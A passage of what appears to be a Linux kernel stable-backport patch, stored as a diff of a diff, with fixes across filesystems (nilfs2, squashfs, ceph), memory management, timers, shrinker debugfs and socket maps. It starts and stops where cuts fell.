++++ b/fs/ceph/super.h
+@@ -100,6 +100,17 @@ struct ceph_mount_options {
+ 	char *mon_addr;
+ };
+ 
++/* mount state */
++enum {
++	CEPH_MOUNT_MOUNTING,
++	CEPH_MOUNT_MOUNTED,
++	CEPH_MOUNT_UNMOUNTING,
++	CEPH_MOUNT_UNMOUNTED,
++	CEPH_MOUNT_SHUTDOWN,
++	CEPH_MOUNT_RECOVER,
++	CEPH_MOUNT_FENCE_IO,
++};
++
+ #define CEPH_ASYNC_CREATE_CONFLICT_BITS 8
+ 
+ struct ceph_fs_client {
+diff --git a/fs/coredump.c b/fs/coredump.c
+index 095ed821c8ace..4d332f1471373 100644
+--- a/fs/coredump.c
++++ b/fs/coredump.c
+@@ -831,6 +831,30 @@ static int __dump_skip(struct coredump_params *cprm, size_t nr)
+ 	}
+ }
+ 
++int dump_emit(struct coredump_params *cprm, const void *addr, int nr)
++{
++	if (cprm->to_skip) {
++		if (!__dump_skip(cprm, cprm->to_skip))
++			return 0;
++		cprm->to_skip = 0;
++	}
++	return __dump_emit(cprm, addr, nr);
++}
++EXPORT_SYMBOL(dump_emit);
++
++void dump_skip_to(struct coredump_params *cprm, unsigned long pos)
++{
++	cprm->to_skip = pos - cprm->pos;
++}
++EXPORT_SYMBOL(dump_skip_to);
++
++void dump_skip(struct coredump_params *cprm, size_t nr)
++{
++	cprm->to_skip += nr;
++}
++EXPORT_SYMBOL(dump_skip);
++
++#ifdef CONFIG_ELF_CORE
+ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ {
+ 	struct bio_vec bvec = {
+@@ -864,30 +888,6 @@ static int dump_emit_page(struct coredump_params *cprm, struct page *page)
+ 	return 1;
+ }
+ 
+-int dump_emit(struct coredump_params *cprm, const void *addr, int nr)
+-{
+-	if (cprm->to_skip) {
+-		if (!__dump_skip(cprm, cprm->to_skip))
+-			return 0;
+-		cprm->to_skip = 0;
+-	}
+-	return __dump_emit(cprm, addr, nr);
+-}
+-EXPORT_SYMBOL(dump_emit);
+-
+-void dump_skip_to(struct coredump_params *cprm, unsigned long pos)
+-{
+-	cprm->to_skip = pos - cprm->pos;
+-}
+-EXPORT_SYMBOL(dump_skip_to);
+-
+-void dump_skip(struct coredump_params *cprm, size_t nr)
+-{
+-	cprm->to_skip += nr;
+-}
+-EXPORT_SYMBOL(dump_skip);
+-
+-#ifdef CONFIG_ELF_CORE
+ int dump_user_range(struct coredump_params *cprm, unsigned long start,
+ 		    unsigned long len)
+ {
+diff --git a/fs/fscache/volume.c b/fs/fscache/volume.c
+index 903af9d85f8b9..cdf991bdd9def 100644
+--- a/fs/fscache/volume.c
++++ b/fs/fscache/volume.c
+@@ -280,8 +280,7 @@ static void fscache_create_volume_work(struct work_struct *work)
+ 	fscache_end_cache_access(volume->cache,
+ 				 fscache_access_acquire_volume_end);
+ 
+-	clear_bit_unlock(FSCACHE_VOLUME_CREATING, &volume->flags);
+-	wake_up_bit(&volume->flags, FSCACHE_VOLUME_CREATING);
++	clear_and_wake_up_bit(FSCACHE_VOLUME_CREATING, &volume->flags);
+ 	fscache_put_volume(volume, fscache_volume_put_create_work);
+ }
+ 
+diff --git a/fs/nilfs2/ioctl.c b/fs/nilfs2/ioctl.c
+index 87e1004b606d2..b4041d0566a9a 100644
+--- a/fs/nilfs2/ioctl.c
++++ b/fs/nilfs2/ioctl.c
+@@ -1114,7 +1114,14 @@ static int nilfs_ioctl_set_alloc_range(struct inode *inode, void __user *argp)
+ 
+ 	minseg = range[0] + segbytes - 1;
+ 	do_div(minseg, segbytes);
++
++	if (range[1] < 4096)
++		goto out;
++
+ 	maxseg = NILFS_SB2_OFFSET_BYTES(range[1]);
++	if (maxseg < segbytes)
++		goto out;
++
+ 	do_div(maxseg, segbytes);
+ 	maxseg--;
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 6edb6e0dd61f7..1422b8ba24ed6 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -408,6 +408,15 @@ int nilfs_resize_fs(struct super_block *sb, __u64 newsize)
+ 	if (newsize > devsize)
+ 		goto out;
+ 
++	/*
++	 * Prevent underflow in second superblock position calculation.
++	 * The exact minimum size check is done in nilfs_sufile_resize().
++	 */
++	if (newsize < 4096) {
++		ret = -ENOSPC;
++		goto out;
++	}
++
+ 	/*
+ 	 * Write lock is required to protect some functions depending
+ 	 * on the number of segments, the number of reserved segments,
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 2064e6473d304..3a4c9c150cbf5 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -544,9 +544,15 @@ static int nilfs_load_super_block(struct the_nilfs *nilfs,
+ {
+ 	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+ 	struct buffer_head **sbh = nilfs->ns_sbh;
+-	u64 sb2off = NILFS_SB2_OFFSET_BYTES(bdev_nr_bytes(nilfs->ns_bdev));
++	u64 sb2off, devsize = bdev_nr_bytes(nilfs->ns_bdev);
+ 	int valid[2], swp = 0;
+ 
++	if (devsize < NILFS_SEG_MIN_BLOCKS * NILFS_MIN_BLOCK_SIZE + 4096) {
++		nilfs_err(sb, "device size too small");
++		return -EINVAL;
++	}
++	sb2off = NILFS_SB2_OFFSET_BYTES(devsize);
++
+ 	sbp[0] = nilfs_read_super_block(sb, NILFS_SB_OFFSET_BYTES, blocksize,
+ 					&sbh[0]);
+ 	sbp[1] = nilfs_read_super_block(sb, sb2off, blocksize, &sbh[1]);
+diff --git a/fs/squashfs/xattr_id.c b/fs/squashfs/xattr_id.c
+index b88d19e9581e9..c8469c656e0dc 100644
+--- a/fs/squashfs/xattr_id.c
++++ b/fs/squashfs/xattr_id.c
+@@ -76,7 +76,7 @@ __le64 *squashfs_read_xattr_id_table(struct super_block *sb, u64 table_start,
+ 	/* Sanity check values */
+ 
+ 	/* there is always at least one xattr id */
+-	if (*xattr_ids <= 0)
++	if (*xattr_ids == 0)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	len = SQUASHFS_XATTR_BLOCK_BYTES(*xattr_ids);
+diff --git a/include/linux/ceph/libceph.h b/include/linux/ceph/libceph.h
+index 00af2c98da75a..4497d0a6772cd 100644
+--- a/include/linux/ceph/libceph.h
++++ b/include/linux/ceph/libceph.h
+@@ -99,16 +99,6 @@ struct ceph_options {
+ 
+ #define CEPH_AUTH_NAME_DEFAULT   "guest"
+ 
+-/* mount state */
+-enum {
+-	CEPH_MOUNT_MOUNTING,
+-	CEPH_MOUNT_MOUNTED,
+-	CEPH_MOUNT_UNMOUNTING,
+-	CEPH_MOUNT_UNMOUNTED,
+-	CEPH_MOUNT_SHUTDOWN,
+-	CEPH_MOUNT_RECOVER,
+-};
+-
+ static inline unsigned long ceph_timeout_jiffies(unsigned long timeout)
+ {
+ 	return timeout ?: MAX_SCHEDULE_TIMEOUT;
+diff --git a/include/linux/fb.h b/include/linux/fb.h
+index bcb8658f5b64d..486c4e3b6d6a6 100644
+--- a/include/linux/fb.h
++++ b/include/linux/fb.h
+@@ -662,6 +662,7 @@ extern int  fb_deferred_io_init(struct fb_info *info);
+ extern void fb_deferred_io_open(struct fb_info *info,
+ 				struct inode *inode,
+ 				struct file *file);
++extern void fb_deferred_io_release(struct fb_info *info);
+ extern void fb_deferred_io_cleanup(struct fb_info *info);
+ extern int fb_deferred_io_fsync(struct file *file, loff_t start,
+ 				loff_t end, int datasync);
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 770650d1ff842..58b53d08f2c8e 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -753,7 +753,10 @@ static inline struct hstate *hstate_sizelog(int page_size_log)
+ 	if (!page_size_log)
+ 		return &default_hstate;
+ 
+-	return size_to_hstate(1UL << page_size_log);
++	if (page_size_log < BITS_PER_LONG)
++		return size_to_hstate(1UL << page_size_log);
++
++	return NULL;
+ }
+ 
+ static inline struct hstate *hstate_vma(struct vm_area_struct *vma)
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index 974ccca609d2c..e5e8acf8eb895 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -136,7 +136,7 @@ extern int mmap_rnd_compat_bits __read_mostly;
+  * define their own version of this macro in <asm/pgtable.h>
+  */
+ #if BITS_PER_LONG == 64
+-/* This function must be updated when the size of struct page grows above 80
++/* This function must be updated when the size of struct page grows above 96
+  * or reduces below 56. The idea that compiler optimizes out switch()
+  * statement, and only leaves move/store instructions. Also the compiler can
+  * combine write statements if they are both assignments and can be reordered,
+@@ -147,12 +147,18 @@ static inline void __mm_zero_struct_page(struct page *page)
+ {
+ 	unsigned long *_pp = (void *)page;
+ 
+-	 /* Check that struct page is either 56, 64, 72, or 80 bytes */
++	 /* Check that struct page is either 56, 64, 72, 80, 88 or 96 bytes */
+ 	BUILD_BUG_ON(sizeof(struct page) & 7);
+ 	BUILD_BUG_ON(sizeof(struct page) < 56);
+-	BUILD_BUG_ON(sizeof(struct page) > 80);
++	BUILD_BUG_ON(sizeof(struct page) > 96);
+ 
+ 	switch (sizeof(struct page)) {
++	case 96:
++		_pp[11] = 0;
++		fallthrough;
++	case 88:
++		_pp[10] = 0;
++		fallthrough;
+ 	case 80:
+ 		_pp[9] = 0;
+ 		fallthrough;
+diff --git a/include/linux/shrinker.h b/include/linux/shrinker.h
+index 08e6054e061f3..258b615124b6b 100644
+--- a/include/linux/shrinker.h
++++ b/include/linux/shrinker.h
+@@ -104,7 +104,7 @@ extern void synchronize_shrinkers(void);
+ 
+ #ifdef CONFIG_SHRINKER_DEBUG
+ extern int shrinker_debugfs_add(struct shrinker *shrinker);
+-extern void shrinker_debugfs_remove(struct shrinker *shrinker);
++extern struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker);
+ extern int __printf(2, 3) shrinker_debugfs_rename(struct shrinker *shrinker,
+ 						  const char *fmt, ...);
+ #else /* CONFIG_SHRINKER_DEBUG */
+@@ -112,8 +112,9 @@ static inline int shrinker_debugfs_add(struct shrinker *shrinker)
+ {
+ 	return 0;
+ }
+-static inline void shrinker_debugfs_remove(struct shrinker *shrinker)
++static inline struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker)
+ {
++	return NULL;
+ }
+ static inline __printf(2, 3)
+ int shrinker_debugfs_rename(struct shrinker *shrinker, const char *fmt, ...)
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index fb2e88614f5d1..313edd19bf545 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -252,6 +252,7 @@ struct plat_stmmacenet_data {
+ 	int rss_en;
+ 	int mac_port_sel_speed;
+ 	bool en_tx_lpi_clockgating;
++	bool rx_clk_runs_in_lpi;
+ 	int has_xgmac;
+ 	bool vlan_fail_q_en;
+ 	u8 vlan_fail_q;
+diff --git a/include/net/sock.h b/include/net/sock.h
+index e0517ecc65315..1f868764575c3 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2430,6 +2430,19 @@ static inline __must_check bool skb_set_owner_sk_safe(struct sk_buff *skb, struc
+ 	return false;
+ }
+ 
++static inline struct sk_buff *skb_clone_and_charge_r(struct sk_buff *skb, struct sock *sk)
++{
++	skb = skb_clone(skb, sk_gfp_mask(sk, GFP_ATOMIC));
++	if (skb) {
++		if (sk_rmem_schedule(sk, skb, skb->truesize)) {
++			skb_set_owner_r(skb, sk);
++			return skb;
++		}
++		__kfree_skb(skb);
++	}
++	return NULL;
++}
++
+ static inline void skb_prepare_for_gro(struct sk_buff *skb)
+ {
+ 	if (skb->destructor != sock_wfree) {
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 7f40d87e8f509..48fedeee15c5b 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -1278,10 +1278,11 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 
+ 	group = t->group;
+ 	/*
+-	 * Wakeup waiters to stop polling. Can happen if cgroup is deleted
+-	 * from under a polling process.
++	 * Wakeup waiters to stop polling and clear the queue to prevent it from
++	 * being accessed later. Can happen if cgroup is deleted from under a
++	 * polling process.
+ 	 */
+-	wake_up_interruptible(&t->event_wait);
++	wake_up_pollfree(&t->event_wait);
+ 
+ 	mutex_lock(&group->trigger_lock);
+ 
+diff --git a/kernel/time/alarmtimer.c b/kernel/time/alarmtimer.c
+index 5897828b9d7ed..7e5dff602585d 100644
+--- a/kernel/time/alarmtimer.c
++++ b/kernel/time/alarmtimer.c
+@@ -470,11 +470,35 @@ u64 alarm_forward(struct alarm *alarm, ktime_t now, ktime_t interval)
+ }
+ EXPORT_SYMBOL_GPL(alarm_forward);
+ 
+-u64 alarm_forward_now(struct alarm *alarm, ktime_t interval)
++static u64 __alarm_forward_now(struct alarm *alarm, ktime_t interval, bool throttle)
+ {
+ 	struct alarm_base *base = &alarm_bases[alarm->type];
++	ktime_t now = base->get_ktime();
++
++	if (IS_ENABLED(CONFIG_HIGH_RES_TIMERS) && throttle) {
++		/*
++		 * Same issue as with posix_timer_fn(). Timers which are
++		 * periodic but the signal is ignored can starve the system
++		 * with a very small interval. The real fix which was
++		 * promised in the context of posix_timer_fn() never
++		 * materialized, but someone should really work on it.
++		 *
++		 * To prevent DOS fake @now to be 1 jiffie out which keeps
++		 * the overrun accounting correct but creates an
++		 * inconsistency vs. timer_gettime(2).
++		 */
++		ktime_t kj = NSEC_PER_SEC / HZ;
++
++		if (interval < kj)
++			now = ktime_add(now, kj);
++	}
++
++	return alarm_forward(alarm, now, interval);
++}
+ 
+-	return alarm_forward(alarm, base->get_ktime(), interval);
++u64 alarm_forward_now(struct alarm *alarm, ktime_t interval)
++{
++	return __alarm_forward_now(alarm, interval, false);
+ }
+ EXPORT_SYMBOL_GPL(alarm_forward_now);
+ 
+@@ -551,9 +575,10 @@ static enum alarmtimer_restart alarm_handle_timer(struct alarm *alarm,
+ 	if (posix_timer_event(ptr, si_private) && ptr->it_interval) {
+ 		/*
+ 		 * Handle ignored signals and rearm the timer. This will go
+-		 * away once we handle ignored signals proper.
++		 * away once we handle ignored signals proper. Ensure that
++		 * small intervals cannot starve the system.
+ 		 */
+-		ptr->it_overrun += alarm_forward_now(alarm, ptr->it_interval);
++		ptr->it_overrun += __alarm_forward_now(alarm, ptr->it_interval, true);
+ 		++ptr->it_requeue_pending;
+ 		ptr->it_active = 1;
+ 		result = ALARMTIMER_RESTART;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 2a2ea9b6f7625..e679239864965 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -155,7 +155,7 @@ int trace_define_field(struct trace_event_call *call, const char *type,
+ }
+ EXPORT_SYMBOL_GPL(trace_define_field);
+ 
+-int trace_define_field_ext(struct trace_event_call *call, const char *type,
++static int trace_define_field_ext(struct trace_event_call *call, const char *type,
+ 		       const char *name, int offset, int size, int is_signed,
+ 		       int filter_type, int len)
+ {
+diff --git a/kernel/umh.c b/kernel/umh.c
+index 8506315186652..fbf872c624cbc 100644
+--- a/kernel/umh.c
++++ b/kernel/umh.c
+@@ -438,21 +438,27 @@ int call_usermodehelper_exec(struct subprocess_info *sub_info, int wait)
+ 	if (wait == UMH_NO_WAIT)	/* task has freed sub_info */
+ 		goto unlock;
+ 
+-	if (wait & UMH_KILLABLE)
+-		state |= TASK_KILLABLE;
+-
+ 	if (wait & UMH_FREEZABLE)
+ 		state |= TASK_FREEZABLE;
+ 
+-	retval = wait_for_completion_state(&done, state);
+-	if (!retval)
+-		goto wait_done;
+-
+ 	if (wait & UMH_KILLABLE) {
++		retval = wait_for_completion_state(&done, state | TASK_KILLABLE);
++		if (!retval)
++			goto wait_done;
++
+ 		/* umh_complete() will see NULL and free sub_info */
+ 		if (xchg(&sub_info->complete, NULL))
+ 			goto unlock;
++
++		/*
++		 * fallthrough; in case of -ERESTARTSYS now do uninterruptible
++		 * wait_for_completion_state(). Since umh_complete() shall call
++		 * complete() in a moment if xchg() above returned NULL, this
++		 * uninterruptible wait_for_completion_state() will not block
++		 * SIGKILL'ed processes for long.
++		 */
+ 	}
++	wait_for_completion_state(&done, state);
+ 
+ wait_done:
+ 	retval = sub_info->retval;
+diff --git a/mm/filemap.c b/mm/filemap.c
+index 08341616ae7a1..322aea78058a0 100644
+--- a/mm/filemap.c
++++ b/mm/filemap.c
+@@ -2569,18 +2569,19 @@ static int filemap_get_pages(struct kiocb *iocb, struct iov_iter *iter,
+ 	struct folio *folio;
+ 	int err = 0;
+ 
++	/* "last_index" is the index of the page beyond the end of the read */
+ 	last_index = DIV_ROUND_UP(iocb->ki_pos + iter->count, PAGE_SIZE);
+ retry:
+ 	if (fatal_signal_pending(current))
+ 		return -EINTR;
+ 
+-	filemap_get_read_batch(mapping, index, last_index, fbatch);
++	filemap_get_read_batch(mapping, index, last_index - 1, fbatch);
+ 	if (!folio_batch_count(fbatch)) {
+ 		if (iocb->ki_flags & IOCB_NOIO)
+ 			return -EAGAIN;
+ 		page_cache_sync_readahead(mapping, ra, filp, index,
+ 				last_index - index);
+-		filemap_get_read_batch(mapping, index, last_index, fbatch);
++		filemap_get_read_batch(mapping, index, last_index - 1, fbatch);
+ 	}
+ 	if (!folio_batch_count(fbatch)) {
+ 		if (iocb->ki_flags & (IOCB_NOWAIT | IOCB_WAITQ))
+diff --git a/mm/gup.c b/mm/gup.c
+index eb8d7baf9e4d3..028f3b4e8c3f2 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1978,7 +1978,7 @@ static unsigned long collect_longterm_unpinnable_pages(
+ 			drain_allow = false;
+ 		}
+ 
+-		if (!folio_isolate_lru(folio))
++		if (folio_isolate_lru(folio))
+ 			continue;
+ 
+ 		list_add_tail(&folio->lru, movable_page_list);
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 811d19b5c4f60..e7cf013a0efd0 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -3253,8 +3253,6 @@ void remove_migration_pmd(struct page_vma_mapped_walk *pvmw, struct page *new)
+ 	pmde = mk_huge_pmd(new, READ_ONCE(vma->vm_page_prot));
+ 	if (pmd_swp_soft_dirty(*pvmw->pmd))
+ 		pmde = pmd_mksoft_dirty(pmde);
+-	if (is_writable_migration_entry(entry))
+-		pmde = maybe_pmd_mkwrite(pmde, vma);
+ 	if (pmd_swp_uffd_wp(*pvmw->pmd))
+ 		pmde = pmd_wrprotect(pmd_mkuffd_wp(pmde));
+ 	if (!is_migration_entry_young(entry))
+@@ -3262,6 +3260,10 @@ void remove_migration_pmd(struct page_vma_mapped_walk *pvmw, struct page *new)
+ 	/* NOTE: this may contain setting soft-dirty on some archs */
+ 	if (PageDirty(new) && is_migration_entry_dirty(entry))
+ 		pmde = pmd_mkdirty(pmde);
++	if (is_writable_migration_entry(entry))
++		pmde = maybe_pmd_mkwrite(pmde, vma);
++	else
++		pmde = pmd_wrprotect(pmde);
+ 
+ 	if (PageAnon(new)) {
+ 		rmap_t rmap_flags = RMAP_COMPOUND;
+diff --git a/mm/kasan/common.c b/mm/kasan/common.c
+index 833bf2cfd2a39..21e66d7f261de 100644
+--- a/mm/kasan/common.c
++++ b/mm/kasan/common.c
+@@ -246,6 +246,9 @@ bool __kasan_slab_free(struct kmem_cache *cache, void *object,
+ 
+ static inline bool ____kasan_kfree_large(void *ptr, unsigned long ip)
+ {
++	if (!kasan_arch_is_ready())
++		return false;
++
+ 	if (ptr != page_address(virt_to_head_page(ptr))) {
+ 		kasan_report_invalid_free(ptr, ip, KASAN_REPORT_INVALID_FREE);
+ 		return true;
+diff --git a/mm/kasan/generic.c b/mm/kasan/generic.c
+index d8b5590f9484b..4967988fb3c67 100644
+--- a/mm/kasan/generic.c
++++ b/mm/kasan/generic.c
+@@ -191,7 +191,12 @@ bool kasan_check_range(unsigned long addr, size_t size, bool write,
+ 
+ bool kasan_byte_accessible(const void *addr)
+ {
+-	s8 shadow_byte = READ_ONCE(*(s8 *)kasan_mem_to_shadow(addr));
++	s8 shadow_byte;
++
++	if (!kasan_arch_is_ready())
++		return true;
++
++	shadow_byte = READ_ONCE(*(s8 *)kasan_mem_to_shadow(addr));
+ 
+ 	return shadow_byte >= 0 && shadow_byte < KASAN_GRANULE_SIZE;
+ }
+diff --git a/mm/kasan/shadow.c b/mm/kasan/shadow.c
+index 0e3648b603a6f..ecb7acb3897cd 100644
+--- a/mm/kasan/shadow.c
++++ b/mm/kasan/shadow.c
+@@ -291,6 +291,9 @@ int kasan_populate_vmalloc(unsigned long addr, unsigned long size)
+ 	unsigned long shadow_start, shadow_end;
+ 	int ret;
+ 
++	if (!kasan_arch_is_ready())
++		return 0;
++
+ 	if (!is_vmalloc_or_module_addr((void *)addr))
+ 		return 0;
+ 
+@@ -459,6 +462,9 @@ void kasan_release_vmalloc(unsigned long start, unsigned long end,
+ 	unsigned long region_start, region_end;
+ 	unsigned long size;
+ 
++	if (!kasan_arch_is_ready())
++		return;
++
+ 	region_start = ALIGN(start, KASAN_MEMORY_PER_SHADOW_PAGE);
+ 	region_end = ALIGN_DOWN(end, KASAN_MEMORY_PER_SHADOW_PAGE);
+ 
+@@ -502,6 +508,9 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	 * with setting memory tags, so the KASAN_VMALLOC_INIT flag is ignored.
+ 	 */
+ 
++	if (!kasan_arch_is_ready())
++		return (void *)start;
++
+ 	if (!is_vmalloc_or_module_addr(start))
+ 		return (void *)start;
+ 
+@@ -524,6 +533,9 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+  */
+ void __kasan_poison_vmalloc(const void *start, unsigned long size)
+ {
++	if (!kasan_arch_is_ready())
++		return;
++
+ 	if (!is_vmalloc_or_module_addr(start))
+ 		return;
+ 
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index e0c7bbd69b33e..77a76bcf15f57 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -2608,6 +2608,7 @@ static int madvise_collapse_errno(enum scan_result r)
+ 	case SCAN_CGROUP_CHARGE_FAIL:
+ 		return -EBUSY;
+ 	/* Resource temporary unavailable - trying again might succeed */
++	case SCAN_PAGE_COUNT:
+ 	case SCAN_PAGE_LOCK:
+ 	case SCAN_PAGE_LRU:
+ 	case SCAN_DEL_PAGE_LRU:
+diff --git a/mm/memblock.c b/mm/memblock.c
+index fc3d8fbd2060d..511d4783dcf1d 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -1640,13 +1640,7 @@ void __init memblock_free_late(phys_addr_t base, phys_addr_t size)
+ 	end = PFN_DOWN(base + size);
+ 
+ 	for (; cursor < end; cursor++) {
+-		/*
+-		 * Reserved pages are always initialized by the end of
+-		 * memblock_free_all() (by memmap_init() and, if deferred
+-		 * initialization is enabled, memmap_init_reserved_pages()), so
+-		 * these pages can be released directly to the buddy allocator.
+-		 */
+-		__free_pages_core(pfn_to_page(cursor), 0);
++		memblock_free_pages(pfn_to_page(cursor), cursor, 0);
+ 		totalram_pages_inc();
+ 	}
+ }
+diff --git a/mm/migrate.c b/mm/migrate.c
+index dff333593a8ae..8d5c0dc618a57 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -215,6 +215,8 @@ static bool remove_migration_pte(struct folio *folio,
+ 			pte = maybe_mkwrite(pte, vma);
+ 		else if (pte_swp_uffd_wp(*pvmw.pte))
+ 			pte = pte_mkuffd_wp(pte);
++		else
++			pte = pte_wrprotect(pte);
+ 
+ 		if (folio_test_anon(folio) && !is_readable_migration_entry(entry))
+ 			rmap_flags |= RMAP_EXCLUSIVE;
+diff --git a/mm/shrinker_debug.c b/mm/shrinker_debug.c
+index b05295bab3222..39c3491e28a3e 100644
+--- a/mm/shrinker_debug.c
++++ b/mm/shrinker_debug.c
+@@ -246,18 +246,21 @@ int shrinker_debugfs_rename(struct shrinker *shrinker, const char *fmt, ...)
+ }
+ EXPORT_SYMBOL(shrinker_debugfs_rename);
+ 
+-void shrinker_debugfs_remove(struct shrinker *shrinker)
++struct dentry *shrinker_debugfs_remove(struct shrinker *shrinker)
+ {
++	struct dentry *entry = shrinker->debugfs_entry;
++
+ 	lockdep_assert_held(&shrinker_rwsem);
+ 
+ 	kfree_const(shrinker->name);
+ 	shrinker->name = NULL;
+ 
+-	if (!shrinker->debugfs_entry)
+-		return;
++	if (entry) {
++		ida_free(&shrinker_debugfs_ida, shrinker->debugfs_id);
++		shrinker->debugfs_entry = NULL;
++	}
+ 
+-	debugfs_remove_recursive(shrinker->debugfs_entry);
+-	ida_free(&shrinker_debugfs_ida, shrinker->debugfs_id);
++	return entry;
+ }
+ 
+ static int __init shrinker_debugfs_init(void)
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 96eb9da372cd7..dc66f6715bfc4 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -740,6 +740,8 @@ EXPORT_SYMBOL(register_shrinker);
+  */
+ void unregister_shrinker(struct shrinker *shrinker)
+ {
++	struct dentry *debugfs_entry;
++
+ 	if (!(shrinker->flags & SHRINKER_REGISTERED))
+ 		return;
+ 
+@@ -748,9 +750,11 @@ void unregister_shrinker(struct shrinker *shrinker)
+ 	shrinker->flags &= ~SHRINKER_REGISTERED;
+ 	if (shrinker->flags & SHRINKER_MEMCG_AWARE)
+ 		unregister_memcg_shrinker(shrinker);
+-	shrinker_debugfs_remove(shrinker);
++	debugfs_entry = shrinker_debugfs_remove(shrinker);
+ 	up_write(&shrinker_rwsem);
+ 
++	debugfs_remove_recursive(debugfs_entry);
++
+ 	kfree(shrinker->nr_deferred);
+ 	shrinker->nr_deferred = NULL;
+ }
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 70e06853ba255..7a2a4650a8988 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10385,7 +10385,7 @@ void netdev_stats_to_stats64(struct rtnl_link_stats64 *stats64,
+ 
+ 	BUILD_BUG_ON(n > sizeof(*stats64) / sizeof(u64));
+ 	for (i = 0; i < n; i++)
+-		dst[i] = atomic_long_read(&src[i]);
++		dst[i] = (unsigned long)atomic_long_read(&src[i]);
+ 	/* zero out counters that only exist in rtnl_link_stats64 */
+ 	memset((char *)stats64 + n * sizeof(u64), 0,
+ 	       sizeof(*stats64) - n * sizeof(u64));
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index 22fa2c5bc6ec9..a68a7290a3b2b 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1569,15 +1569,16 @@ void sock_map_unhash(struct sock *sk)
+ 	psock = sk_psock(sk);
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+-		if (sk->sk_prot->unhash)
+-			sk->sk_prot->unhash(sk);
+-		return;
++		saved_unhash = READ_ONCE(sk->sk_prot)->unhash;
++	} else {
++		saved_unhash = psock->saved_unhash;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
+ 	}
+-
+-	saved_unhash = psock->saved_unhash;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	saved_unhash(sk);
++	if (WARN_ON_ONCE(saved_unhash == sock_map_unhash))
++		return;
++	if (saved_unhash)
++		saved_unhash(sk);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_unhash);
+ 
+@@ -1590,17 +1591,18 @@ void sock_map_destroy(struct sock *sk)
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+-		if (sk->sk_prot->destroy)
+-			sk->sk_prot->destroy(sk);
+-		return;
++		saved_destroy = READ_ONCE(sk->sk_prot)->destroy;
++	} else {
++		saved_destroy = psock->saved_destroy;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
++		sk_psock_stop(psock);
++		sk_psock_put(sk, psock);
+ 	}
+-
+-	saved_destroy = psock->saved_destroy;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	sk_psock_stop(psock);
+-	sk_psock_put(sk, psock);
+-	saved_destroy(sk);
++	if (WARN_ON_ONCE(saved_destroy == sock_map_destroy))
++		return;
++	if (saved_destroy)
++		saved_destroy(sk);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_destroy);
+ 
+@@ -1615,16 +1617,21 @@ void sock_map_close(struct sock *sk, long timeout)
+ 	if (unlikely(!psock)) {
+ 		rcu_read_unlock();
+ 		release_sock(sk);
+-		return sk->sk_prot->close(sk, timeout);
++		saved_close = READ_ONCE(sk->sk_prot)->close;
++	} else {
++		saved_close = psock->saved_close;
++		sock_map_remove_links(sk, psock);
++		rcu_read_unlock();
++		sk_psock_stop(psock);
++		release_sock(sk);
++		cancel_work_sync(&psock->work);
++		sk_psock_put(sk, psock);
+ 	}
+-
+-	saved_close = psock->saved_close;
+-	sock_map_remove_links(sk, psock);
+-	rcu_read_unlock();
+-	sk_psock_stop(psock);
+-	release_sock(sk);
+-	cancel_work_sync(&psock->work);
+-	sk_psock_put(sk, psock);
++	/* Make sure we do not recurse. This is a bug.
++	 * Leak the socket instead of crashing on a stack overflow.
++	 */
++	if (WARN_ON_ONCE(saved_close == sock_map_close))
++		return;
+ 	saved_close(sk, timeout);
+ }
+ EXPORT_SYMBOL_GPL(sock_map_close);
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 602f3432d80bc..7a736c352dc4b 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -551,11 +551,9 @@ static struct sock *dccp_v6_request_recv_sock(const struct sock *sk,
+ 	*own_req = inet_ehash_nolisten(newsk, req_to_sk(req_unhash), NULL);
